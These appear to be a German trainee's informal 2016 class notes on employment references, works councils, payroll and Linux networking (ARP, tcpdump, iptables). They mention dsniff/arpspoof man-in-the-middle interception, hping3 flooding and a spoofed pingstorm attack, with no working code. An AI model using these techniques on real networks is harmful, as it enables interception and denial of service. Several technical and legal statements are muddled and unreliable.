Schlusssatz .. (wir bedauern .. ) usw. Wurde einververnehmlich beendet = trennung, sehr neutral. Wie bedauern Wir bedanken uns bei dieser Gelegenheit = Ohrfeige .. sechs.

Wenn jemand zur Betriebsfahrtt zu spät kommt und Betriebsratzugehörigkeit, sowie Sabbatical gegen den Willen des Arbeitnehmers, Aussagen des Gesundheitszustandes, schwerwiegende Krankheit: Darf nicht ins Zeugnis kommen. Jobsuche und Findung im Urlaub reinschreiben .. weil man liest es zwischen den Zeilen raus.

Unterschrift

Sale e tabbaci. Sie hat die Arbeiten stets zu unserer vollsten Zufriedenheit erledigt = 1 Sie hat sich bemüht, die ihr übertr. Arbeiten zu unserer Zufreidenheit zu erledigen = 6

Immer Zwischenzeugnis ausstellen lassen. Chef sagt: „Machen Sie mal einen Entwurf..ich gucke mal drüber“ zulassen .. Leute haben Probleme zu formulieren.

Kurze Beschreibung des Unternehmens.

Aufgaben des Arbeitnehmers.

Leistungsbeurteilung.

Schwierigsten Bedingungen = Superlativ.

Kündigungsfrist Muss mindestens ein halbes Jahr nach Zustandekommen vom Arbeitsverhältnis ausgestellt werden.

Fauler Hund: Diskriminierung.

S. 92 Aufgaben 1. Von KV übernommen: a) nein b) ja nein Unfallversicherung c) nein ja d) ja nein Rentenversicherung e) ja f) ja Nur zur ersten Hilfe g) ja Es sei denn, es ist arbeitsbedingt, dann zahlt die Berufsgenossenschaft.

2. Von Rentenversicherung übernommen: a) ja b) ja nein, zahlt Bundesagentur f. Arbeit c) ja nein BG d) nein e) ja nein f) nein

..

S. 92 Nr. 1: Leistungen von KV übernommen? a) Vorsorgeuntersuchungen: Alle zwei Jahre, also ja!

Zitat: „Vorsorgeuntersuchung - Allgemeine Ganzkörperuntersuchung Anzeigewww.krankenhaus-waldfriede.de/ Es tut nicht weh, es zahlt sich aus Für Ihre Gesundheit · Präventive Untersuchung · Medical Check Up“ Ganzkörperkondom, Gelbkörperhormon! b) Nein, die Berufsgenossenschaft (kümmert sich um A-Sicherheit) c) Ja d) Nein e) Nein f) Ja g) Nein (rente, wa?). JA! 2. Rentenversicherung übernimmt a) Nein b) Ja c) Ja d) Nein e) Ja f) Ja g)

..

S. 93 Aufgaben 1. Steuerklasse: a) Steuerklasse I b) IV c) III und V d) I II e) II f) I

2. Recherce nach Hilfen zur Steuerklassenwahl.

3. Welche A auf welche Krankenversicherung pipapo zutrifft? a) Alle Vier, wenn azubis weniger als 325,00 E verdienen. b) Krankenversicherung, Pflegeversicherung (bei Kinderlosen) c) Arbeitslosenversicherung Kranken- und Pflegeversicherung d) Arbeitslosenversicherung e) Rentenversicherung f) Krankenversicherung g) Arbeitslosenversicherung h) Pflegeversicherung i) Rentenversicherung j) Krankenversicherung k) Arbeitslosenversicherung l) Krankenversicherung Alles Es geht an die Krankenkasse, die haben ein Verteilerbetrag, der leitet alles weiter, sonst drei verschied. Lastschriftaufträge machen müsste .. m) Rentenversicherung Arbeitslosenversicherung

4. Elektronische Lohnsteuerkarte a) Finanzamt b) Steueridentifikationsnummer, Gebutsdatum c) Gemeindeverwaltung? Freibetrag = Steuererleichterung. Werbungskosten = wenn er sich bewirbt, bei and. Unternehmen. Wenn man in Arbeit bis und sich nebenbei bewirbt .. Finanzamt d) Jahresbruttoeinkommen; Lohn- und Gehaltsvorschüsse nur der Arbeitgeber zahlt unfallversicherung

5. Gehaltsabrechnungen durchführen: a) 1676 E Nettoentgelt; 1826,97 E Kirchensteuersätze von Bundesländern her unterschiedlich Seehofer, aus Bayern: Er ist für ein komplett neues Steuersystem Eingangssteuersatz: 12% Seepofer. b)

Recht, Verträge Steuern hinter suchbegriff IHK = gute Ergebnisse.

So weit ich mich erinnere, hatten wir all diese Ausgaben aus dem Buch..

27.9. BWL: Arbeitnehmer Rechten & Pflichten

28.9. BWL: Betriebsrat Mitbestimmung

1976 in Kraft getreten.

Ziele: -Einflussnahme der Arbeitnehmer auf unternehmerische Entscheidungen wie Arbeitsbedingungen, Entwickl. Der Zukunft der Arbeitsplätze. In Berlin gab es medzintechn. Apparaturen 1920.

-Dämonisierung Demokratisierung der Wirtschaft (Nachteile & Belast. Der AN ausgleichen)

-Verhinderung v. Reibungsverlusten zw. AG und AN. Chaostheorie: flache Hierachien. .. dass sich alles im Grunde selbst entwickelt. Chef sagt: „Macht mal“. Unabhängig von Mitarbeiter. Bei Würth funktioniert es. Es gibt aber auch Menschen, die brauchen Führung.

-Steigerung der Leistungsfähigkeit des Unternehmens

-Machtkontrolle Machtsupertrolle

-Gleichbrechtigung

-Humanisierung d. A-Welt -Mitarbeitermotivation

-Arbeitsschutz

-Mitarbeiter können Betriebsabläufe schnner einschätzen .. wer innovativ ist, der kriegt eine Prämie .. sie kann auch in gewährtem Urlaub ausfallen.

Arten:

Arbeitsschutz, Vorschlagsrecht, Recht a. Akteneinsicht

Betriebliche Mitbestimmung durch Betriebsrat .. jobcenter: Betriebsrat heißt Personalrat .. Mitarbeiterzertretung im kirchl. Bereich.

-Gestaltung von A-Plätzen, A-Abläufen, techn. Anlagen & Rah-Bedingungen z.B. A-Zeit. -Personalplanung -Zeiterfassung Mitarbeiter im Öffentlichen Dienst haben Karte, die alles erfasst Siemens Hauptzentrale in München .. kontaktlosen chip, wo Mitarbeiter im Gelände sind. Mitarbeiterüberwachung. Dann konnte der Betriebsrat das Unternehmen verklagen.

-Leistungstrolle und Beurteilungssysteme lässt sich messen, wenn nicht messbar = uninteressant. Gut gearbeitet: wie misst man das? Messen geht nur, wenn ich Ziele definiere, Zielwasser getrunken habe. Harry Peel aus Kiel kann das von Natur aus. James Dean aus Berlin auch. Oder George Hanford aus Frankfort.

-Interessensausgleich und Soz-plan -Einführung von IT-Systemen (Achtung: Starkstromgefahr!) -Anreizwäschesysteme und Incentives: Veranstaltungen, die ein Unternehmen für die Mitarbeiter macht. Kanufahren, Paintball. -Mitarbeiterausqual, Kündigungen -Schulungen und Quälifizierungsmaßnahmen Weiterbildungmaßnahmen

-Auspfotlung von Betriebveraufbahrungen (Aushandlung der Betriebvereinbahrungen) bestehen unter einem Kalifvertrag. (Tarifvertrag) Der AG sagt, ob Gleitzeit eingefügt werden.

Gleitzeit: “Arbeitszeitregelung, bei der Anfang und Ende der Arbeitszeit innerhalb bestimmter Grenzen frei gewählt werden können.”

Unternehmensmitverstimmung durch Arbeitnehmerzertretung im Aufsichtsrat Überwachen des Vorstands msa=Unternehmensführung Weltweit: jetzt Amis.

Gesetzesgrundlagen: Betriebsanfassungsgesetz Für mehr als 5 ständig .. weiter ??

Montanmitbestimmungsgesetz Dasw „neue System“ mit Grep: grep Martin /media/bla/Wechseldaten/Zusammenfassung_Unterricht_bis_Gegenwart2.txt

Also, man muss mich (dieses Dokument) erst in eine *.txt-Datei umwandeln, dann hat man ne menge Fun mit Grep!

Arbeitsfelder des Betriebsrates: soziale Angelegenheiten, Personelle Angelegenheiten, Gesundheitsschutz, wirtschaftliche Angelegenheiten.

Seite 76: Geil! BetrVerfassungsGesetz: 1. a) Triebrat muss eingetrichtert sein, in jedem Betrieb: Nein. Gilt erst ab fünf ständigen wahlberechtigten Arbeitklauern bzw drei ohne Tarifvertrag. Aber kann. b) JA – Jede Nicht-Kohlenstoffeinheit (nicht leitende) eines Mitarbeiter ab 18 Jahren sind wahlberechtigt. c) Nein, alle vier Jahre gilt eine Amtszeit. d) Ja (nein). Eine ordentliche Kündigung ist nicht zulässig. e) Ja

2. Welchen Änderungen im Betrieb B-Rat zustimmen: a) Nein – betrifft Arbeitnehmerrechte nicht. b) Ja § 87 nr. 6 c) Ja .. betrifft Rational die a-beiter d) nö aber not-ja e) Ja – Was wird mit unseren Leuten passieren? nö f) Ja – Worum geht’s da überhaupt – zumutbar ?? nö g) Ja, Unternehmer muss B-Rat informieren und deren Stellungnahme einholen. Nein h) Nö. Allgemein = nicht speziell. ja i) Nö j) Ja .. wirklich Diebstahl? Nein, weil außerordentliche Kündigung k) Ja l) Ja – Arbeitsplätze, was damit? nein m) Ja, weil Kantine Arbeiter betrifft .. deren Mineralienaufnahme. .. proaktive Mitarbeiter .. n) Ja, muss bei einführung techn. Einrichtungen zur verhalt-kontr zustimmen.

3. a) falsch, erst ab 3 mitarbeitern. b) ja, nur Heimarbeiter dürfen wählen c) ja d) nein, viermal. e) ja f) nein ja g) ja h) ja nein i) nein. Ab dem 18. j) Nein, vier. k) ja .. wenn jeder Englisch kann, oder sie Deutsch spricht l) ja nein m) nein n) ja o)ja p) teilweise Ja, wenn es um ihre Belange geht (weiterbildungstag 1x im Monat z.B.). Jugend -und Auszubildenenvertreter

Der Betriebsrat kann Antragsgegner im A-Gericht sein.

Betriebsverfass

Abmahnungen werden persönlich ausgesprochen.

29.9.2016: BWL: Mitarbeiterführung, Personalentwicklung

Personalentwicklung worum geht es? Das Suchen: Recruitment. Große Untermehmen: Die stellen nicht ein, sondern haben Recruitment Centers. Solche gesuchten Menschen werden eingestellt .. das hat nichts mit Assesment-Center zu tun. Personalentwicklung Freisetzung

Lebenslanges Lernen

Unternehmensziele: Die Geschäftsführung hat den Beitrag der Personalentwicklung zur Wettbewerbsfähigkeit im Blick.

Personalbedarf: Wolen motivierte & zufriedene Mitarbeiter.

Individ. Berufl. Wünsche: Mitarbeiter wollen ihr wissen neigungsgerecht vertiefen, Talent Managements. Es geht auch um Rekrutierung, Förderug und Bildung besonders talentierter Mitarbeiter – Stichwort High Potentials – beschäfigt. War of Talents.

Xing social skills. Plattform Registrierung Profil → Send conti = größter Autozulieferer in Dtl. Die Kunst des Erkennens ist die Kunst des Führung – es ist wichtig, dass man Talente erkennt. Man muss die High Potentials nur kitzeln, stimulieren, anstupsen.

Asin Menger hat aus Ösil Mezi Potentiale raus geholt. Von selbst kommen die Menschen nicht drauf, es muss von außen angestupst werden.

Talententwicklung gilt in der Pers. Entwicklung als Königsdisziplin.

Davon profitieren sowohl das Unternehmen, als auch die Mitarbeiter – eine Win-Win-Situation für beide Seiten.

Wenn ein Unternehmen ein gutes Produkt erzeugt, ist die Empfehlug das beste Instrument des Marketings.

Soziale Kontakte: Ich habe Einfluss, du bist ein sozialer Kontakt.

Ein Erlebis 40.000 Mal weiter getragen, bei d. Soz. Kontakten. Wir haben über 2000 soziale Kontakte. Aber das ist Marketing.

Viele Arbeitsverhältnisse kommen über Empfehlungen zu Stande.

Amerikaner sind irritiert, wenn wir „Public viewing“ sagen, weil in Amerika geht man beim Public Viewing noch mal eine Leiche besuchen. Ziele Personal-entw d. Unternehmen: fachliche und meth Qualität der Mitarbeiter aufrecht zu erhalten und weiter zu bilden (etwas analytisches Denken, Projektmanagement und Kostenbewusstsein). Soziale und persönliche Qualifickation .. man kann von einem Azubi nicht verlangen, zehn Leute im Team zu leiten. Versagen: Der Chef, wenn er einen Menschen mit mangelnden empathischen Fähigkeiten als Teamleiter einstellt. Wenn jeder in der Firma drüber spricht, ist er „verbrannt“. - Vorhandene Defizite abbauen und ungenutzte Potenziale erkennen und fördern - Eignungs- und Neigungsgerecht Neigezugtechnik - Unternehmen investiert auch in den Mitarbeiter persönlich manche arbeiten immer in Projekten aber nicht jeder ist geeignet

Personalentwicklung und Weiterbildung Seite 96 Nr .1 Mitarbeiterfluktuation von jährl. 23 auf 19 reduziert: 4,37 %

Seite 90 (meine Auflage) Entgeltabrechnung:

Kai behauptet, der Staat vergewaltigt dich, weil er zur Hälfte DEINES Bruttogehalts frißt!

Leistungen honoriert und wird im Tarifvertrag, B-Vereinbarung, oder im A-Vertrag festgelegt..

Lohnformen und Zusatzleistung des A-Gebers: Zuschlag: Schmutzzuschlag, Kinderzuschlag.

Akkordlohn: Nach Ergebnis unabhängig von der A-Zeit.

Arbeitgeber kann verpflichtet sein, einen Teil d. Arbeitsverdienstes vermögenswirksam anzulegen.

Bei Streitigkeiten zw. Arbeitgeber und Arbeitnehmer fragt der Richter immer: Haben Sie die Stellenbeschreibung gelesen? Berufung 1. Instanz Revision in zweiter Instanz und auf dem klassenserver liegt noch ein Verzeichnis, wo „Pöppel“ drauf steht ..

Freitag 30.9.2016: Exkursion Makers Faire 8:45 Uhr Luckenwalder Str. 4-6 10963 Berlin Makers Faire dann hatten wir mit Ingo TCP-Protokolle und hexdumps ...

– (Gehört irgendwo Ende Mai eingefügt) Ein Gateway verbindet Rechnernetze, die auf völlig unterschiedlichen Netzwerkprotokollen basieren können.

Außerdem sei PPPoE nicht veraltet, es läuft im Hintergrund weiter!

Laut RFC 4949 sind typische Erscheinungsformen eines Gateways: Bridge, Router und Proxy Server. Mit der Vorherrschaft des IP-Protokolls zog der Router immer öfter an die Stelle des Gateways. Gateways werden daher im allgemeinen Sprachgebrauch oftmals mit Routern gleichgesetzt, obwohl ein Gateway nicht zwangsläufig ein Router ist. Ilja sagte, dass dieser route-Befehl die Bridge ist. Er hätte auf fisicloud einen Proxy angelegt.

4.10.2016 Linux: ARP, OSI-Schichten mit Ingo

Die Impedanz einer Leitung kann man mit einem Oszilloskop ausmessen. Wenn Spannung (5 Volt) anliegt, geht die Kurve nach oben, sonst (0 volt) liegt sie unten. Am einem Ende ist eine Arduino-Platine, am anderen ein Potentiometer-Widerstand. Das Signal vom Oszilloskop kann verschliffen sein, von daher wird am Potentiometer gedreht, bis es exakt ist. Auch Terminator Früher gab es über BNC-Verbindungen Bus-Topologien, die über einen Rechner, einer Bridge, miteinander verbunden werden konnten. Heute ist ein Switch viel intelligenter. Er weiß, welcher Rechner an welchem Port sitzt. Ein Rj45-Kabel hat acht Adern. Die Außenränder sind mit dem Terminierungswiderstand belegt, in der Mitte fließen die Daten. Eine MAC-Adresse ist 48 Bit groß. In den ersten 24 Bit packen die Hersteller Daten rein, denn die MAC ist fest im ROM der Netzwerkkarte eingebrannt. Das ist ein Microkontroller. Die Mac-Adressen werden über das Arp-Protokoll gesteuert. Dieses kann man über arp -an (Linux), oder arp -a (Windows) aufrufen. Arp im LAN in Aktion: "Alles, was nicht lokal ist, schicke zum Gateway". Dort wird vom Router dem Paket eine IP verpasst

(Arbeitssystem auf bootfähigen Stick packen) ssh & ncat operieren in der Anwend-Ebene des OSI-Modells (Schicht 7).

Arp-Spoofing apt install dsniff Wikipedia (English only): "Dsniff is a set of password sniffing and network traffic analysis tools to parse different application protocols and extract relevant information. Dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). Arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). Sshmitm and webmitm implement active man-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI." arp-request ip mac (Nach der MAC wird gefragt). Wenn was rein kommt: arp-replay ip is at MAC. Diesen Arp-Table (kann man sich mit arp -an ansehen). Man kann eine man-in-the-middle-Attack aufbauen, indem sich der Angreifer-Rechner als Proxy ausgibt. Dieser ist sehr schwer für Angreifer zu entdecken, weil das Betriebssystem denkt: "netter Proxy". Aber: "Der Hacker ist jetzt der Proxy!"

Dagegen kann man sich schützen, indem man seine IP statisch macht, innerhalb der Arp-Tabelle.

Wenn man unter "arp -an" "PERM on eth0" hat, ist man sicher! ping -> Abfrage pong -> Antwort

Das ICMB-Protokoll ( Internet Control Message Protocol) dient in Rechnernetzwerken dem Austausch von Informations- und Fehlermeldungen über das Internet-Protokoll in der Version 4 (IPv4). Die meisten ICMP-Pakete enthalten Diagnose-Informationen: Sie werden vom Router zur Quelle zurückgeschickt, wenn der Router Pakete verwirft, etwa weil beispielsweise das Ziel nicht erreichbar ist oder die TTL abgelaufen ist. ICMP - Pakettype - 8-Bit-Wert

Traceroute Zitat: "Traceroute ist ein Computerprogramm, das ermittelt, über welche Router und Internet-Knoten IP- Datenpakete bis zum abgefragten Rechner gelangen." Will man bis zur fisicloud tracerouten, muss zuerst die Route gesetzt werden. Dann kann man sich die Server anzeigen lassen, über die man bis zur Fisicloud geht. Jedes Datenpaket hat einen positiven Wert, wenn es auf die Reise geschickt wird. Es gibt auch eine Durchreiche-Zeit, wie lange ein Paket leben soll. Die Traceroute hatten wir an der Firewall vorbei geleitet, um zu wissen, wieviele Rechner auf dem Weg zur Fisi stehen! Mit TCPdump sieht man den gesamten Netzwerktraffic, der an meiner Schnittstelle vorbei kommt. tcpdump -n (numerisch) lp -a tcpdump -n -i eth0 tcpdump -n -i eth0 -v ip host 188.68.50.27 ... -v heißt interface.

Wie man auf einem Ping die Ziffern sehen kann, die übermittelt werden. tcpdump -n -i eth0 -v ip host 188.68.50.27 -X Dann auf neuem Konsolenfenster pingen mit: sleep 3; ping 188.68.50.27 -c1 -n sleep 3; ping 188.68.50.27 -c1 -n -p fade = damit kann man die Ausgabe von TCPdump verändern. ping 188.68.50.27 -c 1 -t ... c1 soll count 1 heißen. ping 188.68.50.27 -c 1 -t 1 Die ttl wird vom Server zu Server herunter gezählt. Unter 8 gibt es immer einen Error, weil es sieben Server auf dem Weg zur Fisicloud gibt. route add -host 8.8.8.8 gw 192.168.111.111 eth0 dig @8.8.8.8 comcast.com Ingo konnte sogar ermitteln, wo die einzelnen Server auf der Traceroute zur fc nach Karlsruhe stehen.. ..wie er das gemacht hat, würde ich gerne mal wissen.

5.10.2016 Linux: ARP, OSI Schichten route add -host 8.8.8.8 gw 192.168.111.111 eth0 route add -host 188.68.50.27 gw 192.168.111.111 eth0 Von 192.168.22.x 255.255.255.0 eth schafft man es nicht, 192.168.111.111 255.255.0.0 zu erreichen! Aber mit route! Googlen steht in meinen notizen. Random: Wenn zwei gleichzeitig reden, wird für beide eine zufällige Zeit gewählt, wann sie reden.. Ich konnte traceroute bereits auch nutzen, also zu Hause, indem ich meinen Gateway, sowie die ETH- Schnittstelle angegeben hatte. Ein Gremium hatte sichin den 70er-Jahren über das Schichtenmodell geeinigt.

Dann sind da Zeichnungen, die hatte ich dem Ingo von der Tagel abgeschrieben, aber nicht verstanden, worum es ging:

TCP/IP Destin 1100 MAC <- 10110 ?IP? = 3. Schicht (Vermittlungsschicht) 0110 MAC <- 10110 IP = 2. Schicht (Sicherungsschicht) Kann schon adressieren 0101101 = 1. Bitübertragungsschicht

Finde ich völlig verwirrend. Sorry! Es könnte aber richtig sein, wenn ein BC schon erfolgt ist.

Aber, Das TCP/IP steht auch für sich, in der vierten, der Transportschicht. Mathias, der neben mir sitzt, konnte nicht den zusammenhang zu anderen protokollen erklären.. .. oder? ingo hatte uns wahrscheinlich alles verwirrt.

..vielleicht Herr Rüdiger? tcpdump -v arp host 192.168.50.65 Wenn ich dann meinen rechner anpinge, sehe ich im vom TCPdump ausgegebenen Arp-Table diesen Ping. Also wir hatten zwei konsolenfenster offen, auf einem war ein Befehl gestartet, wo ein anderer gleichzeitig was ausgelesen hatte. Welche bits finde ich wo .. ?? seltsame frage .. Was auch gesniffte Sachen anzeigen kann, außer TCPdump, ist snort und wireshark. (Dann zu tcp-ip. Das tut mehr drauf) Protocol-Overhead = alles, was ich zusätzlich übertrage. Gateway = Adresse der Netzwerkkarte.

Wenn man auf die 192.168.111.111 eine Website setzt, muss der Proxy das erst erlauben. Die 111.111 hat ein paar Einträge zur Fisicloud.

NAT = Network Adress Translation RFC = Request for Comments .. techn & orga. Docs des RFC-Editors zum Internet. Wireshark niemals als root installieren (Exploit-Gefahr) tcpdump -i eth0 -s1600 -n -w /tmp/cap host 192.168.0.254 tcpdump .. interface .. eth0 entfällt, weil er das erste Interface nimmt .. Länge der Pakete, die mitgeschnitten werden sollen .. numerisch (ich brauche die Namen nicht und will nicht warten) .. schreib es in ein File .. host 192.168.0.254 Der pcap-filter ist die weitest verbreitete Library, um sich Netzwerkpakete ansehen zu können. tcpdump -r /tmp/cap -X|head -n 222 ACK = Acknowledgement .. Dann geht es um Anfragen und wie der Zeilrechner mit sync ack reagiert und man dann wieder reeagiert. Das ist der 3-Wege-Handshake. Dann sind da Notizen, wie: "Der Proxy kann erst nach einem 3-Wege-Handshake antworten". Die Präambel ist dafür da, dass sich Pakete finden und das mit dem 3-Wege-Handshake ist dafür da, damit Paketketten übertragen werden. Die MAC-Adressen werden in das Ethernetframe gepackt und das TCP/IP auch. DAS TCP/IP braucht keine Präambel, weil es das Ethernetframe schon macht. Wenn das Paket das LAN verlässt, über Glasfaser transportiert wird, wird die MAC+TCP aus dem Ethernetframe ausgepackt und in ein LWL-Frame gepackt. Treffen sie auf einen Router mit DSL-Leistungs-Connection, wird das MAC incl. TCP in ein DSL-Frame gepackt, bis es an den Router des Zielrechner-Netzwewrks gelangt. Dort werden die mac + die daten + tcp/ip wieder in ein Ethernet- oder wifi-Paket gepackt bis zum Zielrechner.

6.10.2016 Linux: IP-Protokoll, Netzwerkanalyse

Wir sollten das TCP/IP-Datengramm analysieren. Version: Enthält Versionsnummer des Protokolls. Es gibt die Möglichkeit, über eine längere Zeit mit verschiedenen Versionen des IP-Protokolls zu arbeiten. NIDS = Sniffer snort <- gutes Programm

Ohne Datum Konfiguration der Firewall

Firewall: Jeder darf auf Port 80 zugreifen. Aber darf Blume auf Port 22 zugreifen??

Regeln der Firewall: ACCEPT, DENY, DROP Der Befehl DROP ist rigoroser, denn er sagt nicht Bescheid, dass der Zugriff auf den angesteuerten Port nicht erlaubt ist!

Ingo machte mit uns das Script noFW.sh (noFireWall), damit man sich selbst nicht vertippt (und damit aussperrt). sleep22;noFW.sh Mit diesem Script wird die Firewall auf reset gesetzt. In entfernte Rechner in die Konsole rein booten. iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P OUTPUT DROP, ODER INPUT DROP (beides möglich,

Bei einem großen Provider(einem Netz mit einer 16er-Maske): P(port) 80 INPUT ACCEPT 443 OUTPUT

P22 INPUT Firmen iptables 22220 OUTPUT Netz/IP ACCEPT

P53 -pudp ACCEPT DNS P80 für Updates(Ubuntu,Debian) ACCEPT iptables - save > /etc/fw.rules (sichern) iptables-restore < /etc/fw.rules iptables -nL -v = zeige Regeln an iptables -D INPUT -p tcp --dport 80 -j ACCEPT

Beim Editor Nano kann man mit ctrl+k jene Zeile ausschneiden, in welcher der Cursor sitzt. anstatt ein Modem zu benutzen, geht auch ein Rechner mit Netzwerkkarte; muss Karte mehr, sondern bist jetzt ppp & PW vom Provider. iptables -nL -t nat -w ute versteckt Ingos Rechner mit Hilfe von NAT -> mit privaten IPs ins öffentliche Netz, die ausgetauscht werden.

Das Prinzip von NAT Übersetzung der vielen internen IPs über die externe IP. Jeder Rechner im Subnetz kann mit NAT ins Netz, was sie normalerweise nicht können. FritzBox Port-Forwarding hat damit was zu tun.. Auf einem NAT-Rechner(Router) bietet es sich an, eine Firewall zu installieren. Mein Arbeitsplatz-Rechner macht kein NAT, aber jemand in der Schule macht für uns NAT.

Achtung, NAT ist was anderes als NAS!

IP und ARP = OSI 1-3 tcp & udp & ARP = OSI 4 - 7 tcpdump -n -s1600 -v -xx mtu -vv 15xx -vvv dann kann man noch zwischen -r und -w entscheiden. Wo finde ich was bei einem Hexdump wieder (TCP/IP-Protocol) pcap-filter zum sniffen nlip, hping3, srup3 TCP-Flooding -> network packing hping, was on-the-fly - Netzwerk - Pakete generieren kann. TCL-Language nutzend.. Package Crafting-Tools Dann kommt eine Grafik, die verdeutlicht, wie mittels hping ein unscheinbarer Rechner durch das Internet einen anderen über Pingstorms angreifen kann, indem er Firmennetze manipuliert.

Ich vermute, dies ist das Prinzip des Botnetzes. Botnetz Zitat: "Der Teenager mit dem Pseudonym Mafiaboy griff mehrere Tage lang Yahoo, ETrade, Dell, eBay, Amazon und andere Seiten an, und überflutete sie mit großen Mengen unbrauchbarer Anfragen, bis ihre Server abstürzten. Auch wenn Mafiaboy, der mit richtigem Namen Michael Calce heißt, keine Botnetze für seine Angriffe verwendete, warnten Security-Experten anschließend, dass Botnetze (große Netzwerke aus PCs, die mit speziellen Schadprogrammen infiziert worden waren) eine enorme Gefahr für die Stabilität und Integrität des Internets darstellten. Damit hatten sie den Nagel auf den Kopf getroffen. "

Ein Paket schicke ich nicht Rechner Blume, sondern an die Firma ABC... Alle antworten Mr. Niceguy. Niceguy möchte aber Blume ärgern(weil er Traffic macht). Der Niceguy gibt BC an ABC; sagt: "Hallo, ich bin Blume" (rieche nach rose) Dann bekommt Blume einen Pingstorm auf dem Hals!

Was Blume machen kann: -> eine IT-Sicherhieits-Firma beauftragen, was viel Geld kostet. Adressen faken, z.B. Mr. Nice Guy kann es, um es Blume in die Schuhe zu schieben. und ich kann die Attacke auch durch das Netz auf einen anderen Rechner im Netz schicken.

Dann mussten wir einen TCP-DUMP-Mitschnitt untersuchen

Gab es vor dem Ansurfen der Webpage schon Kontakt? 1 Begründen: "Nein, weil der Sender erst den BC los schickt, um die MAC zu holen". 2 Die Sequenz-Nr blieb nicht gleich, 3 und sie hatte sich immer um 1 erhöht.

Sequenz-Nr und ttl das gleiche??

Mit LEX kann man seine eigene Sprache installieren (wandelt es in c um, oder so ähnlich). zitat: " Das Programm Lex wird im Übersetzerbau benutzt, um Scanner für die lexikalische Analyse von Quelltexten zu erstellen. Ein lexikalischer Scanner ist Teil eines Übersetzers." von Programmiersprachen.

Proxyänderung unter Windows: Systemsteuerung -> Netzwerk- und Freigabecenter -> LAN-Verbindung -> IPV4 auswählen -> automatisch beziehen, oder proxy mit submask etc. eintragen Dann hatten wir ab..

10.10. PHP Arrays, Explode / Implode mit Jan Hill ..

Arrays, fopen, fuck buttons etc … Erst übten wir Requests ...... dann einfache Arrays...

11.10. PHP: Requests, Formulare ...solche Sachen...... Rechner...

12.10. PHP: Bestellsystem, Mailer ...Asoziative Arrays...
...Wahrscheinlich wieder Asoziative Arrays...

13.10.2016 PHP: Übung online Telefonverzeichnis

...Datenbank-Anbindung

Führerschein machen Ein Switch hat keine IP-Nummer.

Tcpdump.

Was ich gut finde, ist Snort. Snort ist ein Programm, dass in den OSI-Protokollen nach Exploits und nach anderer Schadsoftware schnüffelt, also einen Hackerangriff erkennen kann, so weit ich es verstanden habe. Wiki: \"Es kann zum Protokollieren von IP-Paketen genauso wie zur Analyse von Datenverkehr in IP-Netzwerken in Echtzeit eingesetzt werden.\" Allerdings weiß ich nicht, wie und wo Snort schnüffelt und wie man exploits erkennen kann!

Bernhard und ich wollen morgen die suchfunktion für php7 fit machen. sed -i 's#< br >##' /pfad zu dem skript in das ich diesen Test rein kopiere.txt Dies stelle ich mir als Lösung vor, um diesen Text in ein Schreibprogramm, oder ein PDF zu packen, ohne einzeln jedes < br > raus löschen zu müssen!

Francesco am Donnerstag fragen, ob er mir auch ein Debian einrichtet, dass man vom Stick booten kann, wie es Jonas und Julian hat. <- erledigt!!! mit ip a kann man sich alle ports in einem computer anzeigen lassen (mein privat-pc hat nur einen)

15.10. Hackers-Lounge Bödi9, Debian fit machen mit Wlan-Treiber, Kopie auf Btrfs mit Martin Mit dem Btrfs-Dateisystem kann man eine ganze Partition komprimieren und damit auch Systeme! Im Klartext bedeutet das, dass mein Debian auf dem 64GB-Stick genau so viel Speicherplatz hat wie sein Klon auf dem 32GB-Stick! Der ganze freie Festplattenplatz incl. Betriebssysten sind wie eine Zieharmonika zusammen gedrückt worden.

Um Mysqldumps wieder in Datenbanken ein zu fügen: mysql -o -u Benuzername -p dbname < /tmp/x.sql

Ohschreckohschreck, ich will Gedit auf Debian installieren. Es war gestern schon so schwierig, den WLAN- Treiber nach zu laden. Weil, Debian hatte die Wlankarte nicht automatisch erkannt. Somit mussten wir mit hwinfo --short alle Hardware anzeigen lassen, um die Versionanummer raus zu finden..

Die Ausgabe sah so aus: network: wlan0 Broadcom BCM43142 802.11b/g/n eth1 Atheros Ethernet controller

Dann copy&pateten wir die Versionsnummer "BCM43142" in die Suchfunktion des Debian-Paketinstaller Synaptics, wo wir dann auch den passenden Hardwaretreiber fanden! Doch bevor wir mit hwinfo --short so schön die Hardware auf dem Präsentierteller hatten, mussten wir mehrere Google-Seiten, github etc. durch lesen. Martin meinte, dass er Ubuntu besser findet als Debian, weil es für Anfänger mehr geeignet sei!

Dann fragte er mich, was Debian für Vorteile habe .. nun ja, die Fachinformatiker meiner Klasse kenen sich damit aus .. aber gesamtsystemtechnisch? Okay, eine gute Wetterfunktion hat es, aber die konnten wir nicht aktivieren. Proxy wieder einschalten: „EDIT: Und sieh auch gleich mal in der /etc/apt/apt.conf nach ob dort ein Proxy gesetzt ist.“

..tcpdump w cap datei .. von wireshark auslesen lassen.. Martin hatte mit der Einrichtung vom Fast-Klons meines Debians, der ja auf btrfs, anstatt auf ext-4 läuft, eine for - Schleife verwendet und Variablen eingesetzt; Außerdem legte er extra Partitionen für den GRUB (Boot Manager) an .. hey, ich werde diese Eingaben "mitfilmen" SKRIENKAST (schreencast) Tzaibergoff!

17.10.2016: Netzwerke (Bridge, Root Bridge Switch, TTL ipv4, Multicast).. mit Hr. Rüdiger

Strukturierte Verkabelung .. erst kommt immer ein Stern. Verkabelung über ein Firmengelände (Primär: Standardverteilung) und darin einzelne Gebäude (Sekundär: Geländeverteilung) mit mehreren Etagen (Tertiär: Etagenverteilung). Damit einher geht das Erstellen von V-Lan's.

Wenn wir physische Netze machen, zweigt von einem Stern-Ast ein Baum ab!

Switch zu Switch ist anders als wie von Netzwerk-Karte zu Switch. Uplinks: immer Flaschenhals .. heutige Karten haben eine automatische Kabelbelegung.

Wir machten Gruppenarbeiten, Matze und ich über Bridge und Switch.

Wenn 5 Rechner mit 1 GB über einen Switch raus wollen, geht nicht mehr als 1 GB raus. -trunk: 2 Leitungen. -Baum: so klein und breit wie möglich. -Root Bridges immer an Servern ansetzen. Cluster (Server an verschiedenen Standorten). Es gibt auch LWL-Karten. Redundanzen schaffen ist Gehirnsschmalzarbeit!

? 2 Netzwerkkarten pro pc ? bei Spanning Tree?

